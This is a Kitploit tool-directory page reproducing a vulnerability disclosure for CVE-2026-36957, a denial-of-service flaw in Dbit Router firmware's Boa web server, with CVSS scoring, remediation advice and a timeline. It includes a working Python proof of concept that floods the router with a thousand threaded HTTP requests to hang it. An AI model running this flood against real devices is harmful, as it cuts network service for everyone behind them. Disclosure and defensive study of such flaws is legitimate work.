Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-36957 — Proof-of-concept for CVE-2026-36957, a denial-of-service vulnerability in Dbit Router firmware via HTTP flood on the Boa web server, causing resource exhaustion and system hang. | Kitploit
Tools/GitHubGitHub/kirubel-cve/cve-2026-36957
Vulnerability AnalysisExploitationWeb SecurityPenetration Testing
GitHubkirubel-cve/cve-2026-36957

CVE-2026-36957

Proof-of-concept for CVE-2026-36957, a denial-of-service vulnerability in Dbit Router firmware via HTTP flood on the Boa web server, causing resource exhaustion and system hang.

View Repository
44 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-36957: Denial of Service via HTTP Flood on Boa Web Server

CVE ID: CVE-2026-36957 Date: 2026-04-29 Discoverer: Kirubel Solomne Vendor: Shenzhen Dibit Network Equipment Co., Ltd. Product: Dbit Router Firmware Version: V1.0.0 CWE: CWE-400 - Uncontrolled Resource Consumption


Description

The Dbit Router firmware V1.0.0 is vulnerable to Denial of Service via the Boa web server URI handler. By sending a high-volume flood of HTTP GET requests to non-existent URIs, an attacker can exhaust critical system resources including file descriptors and memory buffers. This results in a kernel deadlock or system hang that disables the web management portal and all routing capabilities.


CVSS Score

CVSS v3.1 Score: 7.5 (High) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

MetricValue
Attack VectorNetwork
Attack ComplexityLow
Privileges RequiredNone
User InteractionNone
Confidentiality ImpactNone
Integrity ImpactNone
Availability ImpactHigh

Proof of Concept

root@kitploit:~
import requests
import threading

TARGET = "http://192.168.10.1"

def flood(i):
    try:
        requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
    except:
        pass

threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router is still responsive.")

Expected Behavior: Server should limit connections and remain stable. Actual Behavior: Router web interface becomes unresponsive; requires manual reboot.


Impact

  • Complete loss of web management interface
  • Disruption of all routing capabilities
  • Requires manual reboot to restore service
  • Network downtime for all connected devices

Remediation

  • Implement connection rate limiting on the Boa web server
  • Add watchdog timer to recover from deadlock states
  • Limit maximum concurrent connections per IP

Disclosure Timeline

DateEvent
2026-04-29Vulnerability discovered
2026-04-29Reported to MITRE
2026-04-29CVE-2026-36957 assigned
2026-04-29Public disclosure

References

  • MITRE CVE-2026-36957
  • CWE-400
  • Vendor Website
Download Tool